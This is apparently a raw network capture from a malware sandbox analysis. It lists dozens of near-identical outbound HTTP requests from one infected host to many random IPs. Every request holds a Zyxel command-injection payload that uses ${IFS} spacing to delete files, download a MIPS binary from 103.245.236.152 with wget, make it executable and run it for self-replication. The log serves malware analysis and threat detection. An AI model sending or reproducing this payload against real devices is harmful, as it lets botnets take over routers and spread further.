                                            Jan 14, 2024 15:50:30.259123087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1623192.168.2.235272424.43.222.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259154081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1624192.168.2.2342504132.132.210.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259176970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1625192.168.2.235509642.134.53.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259212971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1626192.168.2.233914674.115.111.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259229898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1627192.168.2.234431848.91.169.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259282112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1628192.168.2.2342226120.176.135.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259304047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1629192.168.2.2355500196.195.79.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259304047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1630192.168.2.2343888155.229.242.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259330034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1631192.168.2.2357292160.209.95.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259361982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1632192.168.2.235531836.221.213.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259402037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1633192.168.2.2344152167.172.78.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259435892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1634192.168.2.233677479.15.60.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259459019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1635192.168.2.2360096192.83.186.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259485960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1636192.168.2.2343366153.52.154.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259516954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1637192.168.2.235178823.57.237.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259535074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1638192.168.2.234496261.83.204.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259574890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1639192.168.2.2354854192.18.46.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259588003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1640192.168.2.23492885.131.194.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259599924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1641192.168.2.2349466141.50.81.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259623051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1642192.168.2.2341890153.135.224.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259645939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1643192.168.2.235281263.155.96.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259653091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1644192.168.2.2351000118.168.237.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259685040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1645192.168.2.233418241.202.158.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259727955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1646192.168.2.2335282122.25.98.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259754896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1647192.168.2.2355998184.145.119.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259778023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1648192.168.2.2343966129.138.111.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259813070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1649192.168.2.23488808.205.255.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259814978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1650192.168.2.2334498111.162.230.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259861946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1651192.168.2.234506099.144.102.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259874105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1652192.168.2.233936849.45.46.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259906054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1653192.168.2.2343152115.245.195.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259938002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1654192.168.2.2348508138.169.3.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259972095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1655192.168.2.2347642134.89.58.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.259993076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1656192.168.2.235405088.223.150.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260037899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1657192.168.2.234135284.141.118.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260061026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1658192.168.2.23414302.190.125.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260072947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1659192.168.2.235622423.13.255.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260102987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1660192.168.2.234622261.209.140.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260102987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1661192.168.2.2338888174.50.72.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260143995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1662192.168.2.2340088113.181.143.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260143995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1663192.168.2.235835245.144.183.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260165930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1664192.168.2.2358056104.95.2.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260190964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1665192.168.2.235235864.228.90.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260237932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1666192.168.2.2332774136.251.88.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260270119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1667192.168.2.234837459.154.198.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260288000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1668192.168.2.236021223.44.60.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260325909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1669192.168.2.235129058.160.229.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260338068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1670192.168.2.2339766168.122.92.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260395050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1671192.168.2.2350910182.14.204.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260396004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1672192.168.2.234474436.159.12.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260418892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1673192.168.2.235022268.157.7.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260443926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1674192.168.2.2358016175.202.90.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260505915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1675192.168.2.235131869.125.244.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260521889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1676192.168.2.2359336209.18.30.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260540009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1677192.168.2.2333586158.46.209.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260555029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1678192.168.2.234080697.30.242.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260569096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1679192.168.2.233552678.71.255.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260611057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1680192.168.2.235236061.222.38.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260617971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1681192.168.2.234520659.36.18.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260637999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1682192.168.2.2346876144.178.87.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260670900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1683192.168.2.234730863.95.50.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260716915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1684192.168.2.2346672144.212.25.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.260723114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1685192.168.2.2345534103.67.246.75443
                                            TimestampBytes transferredDirectionData
